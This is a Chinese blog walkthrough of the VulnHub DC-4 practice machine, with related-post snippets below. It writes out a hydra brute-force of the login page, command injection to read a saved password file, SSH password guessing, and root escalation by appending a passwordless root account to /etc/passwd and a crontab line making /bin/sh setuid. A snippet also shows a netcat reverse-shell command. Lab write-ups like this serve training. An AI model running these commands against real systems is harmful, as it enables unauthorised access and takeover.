vulnhub 入门DC-4

已于 2023-01-01 07:43:02 修改
阅读量206 收藏
点赞数
分类专栏: vulnhub 文章标签: linux 网络安全 web安全
于 2023-01-01 07:39:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52780973/article/details/128510344
版权

nmap扫存活主机,192.168.254.132。扫端口服务

在这里插入图片描述

22端口ssh和80,访问80端口,一个管理员登录框

在这里插入图片描述

hydra爆破,用户名admin,登录成功的标志是有logout(burpsuite放大字典卡死,还是用hydra)

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.254.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

在这里插入图片描述

在这里插入图片描述

有个执行命令的文件

在这里插入图片描述

抓包看看

在这里插入图片描述

可以修改命令,看看有哪些用户ls /home

在这里插入图片描述

ssh爆破失败。翻到旧密码文件

在这里插入图片描述

cat /home/jim/backups/old-passwords.bak

在这里插入图片描述

拿旧密码去爆破ssh

在这里插入图片描述

密码为jibril04。ssh连接
在这里插入图片描述

折腾了半天不知道怎么提权,后来才发现有一封mail(ssh连接的时候没注意看),真正的在var/mail/jim

在这里插入图片描述

得到密码^xHhA&hvim0y。切换到charles用户,登录成功。sudo -l看看(jim不能sudo
在这里插入图片描述

能以teehee命令提权。添加一个超级用户(在文件末尾添加)

sudo teehee -a /etc/passwd
pon::0:0:::/bin/bash

在这里插入图片描述

su pon切换到超级用户,得到root权限

在这里插入图片描述

借助teehee添加定时任务,提权

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

每分钟以root用户的身份将/bin/sh的权限提升为4777。当一分钟过后,我们执行命令/bin/sh就可以得到root权限。

在这里插入图片描述
总结

1.hydra爆破登录框,联想登录成功有哪些特征字符串

2.一些意想不到的文件,比如旧密码

3.注意细节,ssh连接成功时收到邮件

4.teehee提权

---------------------------跨年是DC-3和DC-4陪的:)

p0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 307
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1901
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub DC系列 DC-1
m0_64815693的博客
12-28 1962
vulnhub DC系列 DC-1
挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
weixin_68119378的博客
11-28 894
简单分析这个流量包,应该是在ftp传输发生的,而且被抓取对象也使用了匿名登录,查看data协议发现有个文件secret_stuff.txt被上传,内容;命令:cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面/111。接下来我们就可以使用python搭建一个简易服务器,操纵靶机下载这个文件并执行,我们就可以成功提权了,命令和之前说过的一样,用py3的方法搭建即可。ftp有个非常奇怪的功能:匿名登录,但是默认是关闭的,试一试。
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4428
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2028
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1725
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 2826
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2366
Vulnhub-DC-4靶机实战
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1017
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1294
vulnhub-DC-9靶机渗透记录,超详细,适合新手
VulnhubDC-2(新手入门
zhangshuaiijie的博客
06-12 131
这靶机有点难,每个用户的权限都不一样,rbash绕过,git提权。
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1129
vulnhubdc-4详细步骤
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1552
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的基本电路。例如,我们可以选择适当的开关元件和电感元件来实现升压、降压或反激等不同的DC-DC转换功能。 接下来,我们可以通过设置元件的参数来确定电路的工作条件。例如,我们可以设置开关元件的工作频率、占空比和驱动电压等参数,以控制转换器的输出电压和电流。 在进行仿真之前,我们还可以添加一些测量工具,如示波器和多表计,用来监测电路的各种电压、电流和功率等参数。 然后,我们可以进行仿真运行,从而模拟和分析DC-DC转换器的工作情况。在仿真过程中,我们可以观察并记录电路的各种运行参数,以评估转换器的性能和稳定性。 通过仿真结果,我们可以了解到电路的输出电压、电流波形以及开关元件的开关情况等信息。同时,我们还可以进行参数调整,以达到最佳的DC-DC转换效果。 总之,DC-DC仿真电路在Multisim软件中提供了一种方便而有效的工具,可以帮助工程师进行DC-DC转换器的电路设计、仿真和性能分析。它能够加速设计过程并减少实际试验的时间和成本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值